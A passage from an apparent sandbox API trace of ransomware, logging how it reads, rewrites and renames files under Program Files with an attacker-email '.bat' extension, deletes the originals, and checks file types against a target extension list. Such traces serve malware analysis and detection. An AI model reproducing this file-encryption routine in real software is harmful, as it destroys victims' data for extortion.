lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.072] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0057.072] GetLastError () returned 0x0 [0057.072] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x3bb, lpOverlapped=0x0) returned 1 [0057.074] WriteFile (in: hFile=0x34c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3c0, lpOverlapped=0x0) returned 1 [0057.075] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0057.075] WriteFile (in: hFile=0x34c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0057.075] SetEndOfFile (hFile=0x34c) returned 1 [0057.075] CloseHandle (hObject=0x34c) returned 1 [0057.076] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.076] SetEndOfFile (hFile=0x340) returned 1 [0057.077] CloseHandle (hObject=0x340) returned 1 [0057.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0057.077] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html")) returned 1 [0057.077] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.077] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.077] lstrlenW (lpString=".doc") returned 4 [0057.077] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0057.077] lstrlenW (lpString=".docx") returned 5 [0057.077] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0057.077] lstrlenW (lpString=".pdf") returned 4 [0057.078] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0057.078] lstrlenW (lpString=".xls") returned 4 [0057.078] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0057.078] lstrlenW (lpString=".xlsx") returned 5 [0057.078] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0057.078] lstrlenW (lpString=".ppt") returned 4 [0057.078] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0057.078] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.078] lstrlenW (lpString=".zip") returned 4 [0057.078] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0057.078] lstrlenW (lpString=".rar") returned 4 [0057.078] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0057.078] lstrlenW (lpString=".bz2") returned 4 [0057.078] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0057.078] lstrlenW (lpString=".7z") returned 3 [0057.078] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0057.078] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.078] lstrlenW (lpString=".dbf") returned 4 [0057.078] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0057.078] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.078] lstrlenW (lpString=".1cd") returned 4 [0057.078] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0057.078] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.078] lstrlenW (lpString=".jpg") returned 4 [0057.078] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0057.078] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.078] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.079] lstrlenW (lpString=".doc") returned 4 [0057.079] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0057.079] lstrlenW (lpString=".docx") returned 5 [0057.079] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0057.079] lstrlenW (lpString=".pdf") returned 4 [0057.079] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0057.079] lstrlenW (lpString=".xls") returned 4 [0057.079] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0057.079] lstrlenW (lpString=".xlsx") returned 5 [0057.079] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0057.079] lstrlenW (lpString=".ppt") returned 4 [0057.079] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0057.079] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.079] lstrlenW (lpString=".zip") returned 4 [0057.079] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0057.079] lstrlenW (lpString=".rar") returned 4 [0057.079] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0057.079] lstrlenW (lpString=".bz2") returned 4 [0057.079] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0057.079] lstrlenW (lpString=".7z") returned 3 [0057.079] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0057.079] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.079] lstrlenW (lpString=".dbf") returned 4 [0057.079] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0057.079] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.079] lstrlenW (lpString=".1cd") returned 4 [0057.079] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0057.079] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0057.079] lstrlenW (lpString=".jpg") returned 4 [0057.080] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0057.080] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0057.080] lstrlenW (lpString="AppXManifest.xml") returned 16 [0057.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0057.080] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=5944055) returned 1 [0057.080] CloseHandle (hObject=0x340) returned 1 [0057.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml")) returned 0x20 [0057.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0057.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0057.081] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fc64 | out: lpNewFilePointer=0x0) returned 1 [0057.081] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fc24 | out: lpNewFilePointer=0x0) returned 1 [0057.082] ReadFile (in: hFile=0x340, lpBuffer=0x413b058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x268fc30, lpOverlapped=0x0 | out: lpBuffer=0x413b058*, lpNumberOfBytesRead=0x268fc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.084] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x1e3ba7, lpNewFilePointer=0x0, dwMoveMethod=0x268fc24 | out: lpNewFilePointer=0x0) returned 1 [0057.084] ReadFile (in: hFile=0x340, lpBuffer=0x417b058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x268fc30, lpOverlapped=0x0 | out: lpBuffer=0x417b058*, lpNumberOfBytesRead=0x268fc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.090] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x268fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.090] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x56b2f7, lpNewFilePointer=0x0, dwMoveMethod=0x268fc24 | out: lpNewFilePointer=0x0) returned 1 [0057.091] ReadFile (in: hFile=0x340, lpBuffer=0x41bb058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x268fc30, lpOverlapped=0x0 | out: lpBuffer=0x41bb058*, lpNumberOfBytesRead=0x268fc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.107] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.108] WriteFile (in: hFile=0x340, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xc010c, lpNumberOfBytesWritten=0x268fca8, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fca8*=0xc010c, lpOverlapped=0x0) returned 1 [0057.794] SetEndOfFile (hFile=0x340) returned 1 [0057.794] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x43910d8 [0057.798] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fc74 | out: lpNewFilePointer=0x0) returned 1 [0057.798] WriteFile (in: hFile=0x340, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x268fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x268fc80*=0x40000, lpOverlapped=0x0) returned 1 [0057.800] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x1e3ba7, lpNewFilePointer=0x0, dwMoveMethod=0x268fc74 | out: lpNewFilePointer=0x0) returned 1 [0057.800] WriteFile (in: hFile=0x340, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x268fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x268fc80*=0x40000, lpOverlapped=0x0) returned 1 [0057.806] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x56b2f7, lpNewFilePointer=0x0, dwMoveMethod=0x268fc74 | out: lpNewFilePointer=0x0) returned 1 [0057.806] WriteFile (in: hFile=0x340, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x268fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x268fc80*=0x40000, lpOverlapped=0x0) returned 1 [0057.808] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0057.808] CloseHandle (hObject=0x340) returned 1 [0060.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0060.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.552] lstrlenW (lpString=".doc") returned 4 [0060.552] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0060.552] lstrlenW (lpString=".docx") returned 5 [0060.552] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0060.552] lstrlenW (lpString=".pdf") returned 4 [0060.552] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0060.552] lstrlenW (lpString=".xls") returned 4 [0060.552] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0060.552] lstrlenW (lpString=".xlsx") returned 5 [0060.552] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0060.552] lstrlenW (lpString=".ppt") returned 4 [0060.553] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0060.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.553] lstrlenW (lpString=".zip") returned 4 [0060.553] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0060.553] lstrlenW (lpString=".rar") returned 4 [0060.553] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0060.553] lstrlenW (lpString=".bz2") returned 4 [0060.553] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0060.553] lstrlenW (lpString=".7z") returned 3 [0060.553] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0060.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.553] lstrlenW (lpString=".dbf") returned 4 [0060.553] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0060.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.553] lstrlenW (lpString=".1cd") returned 4 [0060.553] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0060.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.553] lstrlenW (lpString=".jpg") returned 4 [0060.553] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0060.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.553] lstrlenW (lpString=".doc") returned 4 [0060.553] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0060.553] lstrlenW (lpString=".docx") returned 5 [0060.553] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0060.553] lstrlenW (lpString=".pdf") returned 4 [0060.553] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0060.553] lstrlenW (lpString=".xls") returned 4 [0060.553] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0060.553] lstrlenW (lpString=".xlsx") returned 5 [0060.553] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0060.554] lstrlenW (lpString=".ppt") returned 4 [0060.554] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0060.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.554] lstrlenW (lpString=".zip") returned 4 [0060.554] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0060.554] lstrlenW (lpString=".rar") returned 4 [0060.554] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0060.554] lstrlenW (lpString=".bz2") returned 4 [0060.554] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0060.554] lstrlenW (lpString=".7z") returned 3 [0060.554] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0060.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.554] lstrlenW (lpString=".dbf") returned 4 [0060.554] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0060.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.554] lstrlenW (lpString=".1cd") returned 4 [0060.554] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0060.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0060.554] lstrlenW (lpString=".jpg") returned 4 [0060.554] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0060.554] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.554] lstrlenW (lpString="AG00126_.GIF") returned 12 [0060.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0060.555] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=3140) returned 1 [0060.555] CloseHandle (hObject=0x340) returned 1 [0060.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif")) returned 0x220 [0060.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0060.555] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.555] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0060.556] GetLastError () returned 0x0 [0060.556] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xc44, lpOverlapped=0x0) returned 1 [0060.730] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xc50, lpOverlapped=0x0) returned 1 [0060.731] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.731] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0060.731] SetEndOfFile (hFile=0x370) returned 1 [0060.731] CloseHandle (hObject=0x370) returned 1 [0060.732] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.732] SetEndOfFile (hFile=0x340) returned 1 [0060.733] CloseHandle (hObject=0x340) returned 1 [0060.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.733] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif")) returned 1 [0061.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.053] lstrlenW (lpString=".doc") returned 4 [0061.053] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.053] lstrlenW (lpString=".docx") returned 5 [0061.053] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.053] lstrlenW (lpString=".pdf") returned 4 [0061.053] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.053] lstrlenW (lpString=".xls") returned 4 [0061.053] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.054] lstrlenW (lpString=".xlsx") returned 5 [0061.054] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.054] lstrlenW (lpString=".ppt") returned 4 [0061.054] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.054] lstrlenW (lpString=".zip") returned 4 [0061.054] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.054] lstrlenW (lpString=".rar") returned 4 [0061.054] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.054] lstrlenW (lpString=".bz2") returned 4 [0061.054] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.054] lstrlenW (lpString=".7z") returned 3 [0061.054] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.054] lstrlenW (lpString=".dbf") returned 4 [0061.054] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.054] lstrlenW (lpString=".1cd") returned 4 [0061.054] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.054] lstrlenW (lpString=".jpg") returned 4 [0061.054] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.054] lstrlenW (lpString=".doc") returned 4 [0061.054] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.054] lstrlenW (lpString=".docx") returned 5 [0061.054] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.054] lstrlenW (lpString=".pdf") returned 4 [0061.054] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.054] lstrlenW (lpString=".xls") returned 4 [0061.054] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.054] lstrlenW (lpString=".xlsx") returned 5 [0061.054] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.054] lstrlenW (lpString=".ppt") returned 4 [0061.055] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.055] lstrlenW (lpString=".zip") returned 4 [0061.055] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.055] lstrlenW (lpString=".rar") returned 4 [0061.055] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.055] lstrlenW (lpString=".bz2") returned 4 [0061.055] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.055] lstrlenW (lpString=".7z") returned 3 [0061.055] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.055] lstrlenW (lpString=".dbf") returned 4 [0061.055] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.055] lstrlenW (lpString=".1cd") returned 4 [0061.055] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0061.055] lstrlenW (lpString=".jpg") returned 4 [0061.055] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.055] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.055] lstrlenW (lpString="AG00142_.GIF") returned 12 [0061.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.057] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=15308) returned 1 [0061.057] CloseHandle (hObject=0x368) returned 1 [0061.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif")) returned 0x220 [0061.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.058] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.058] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.058] 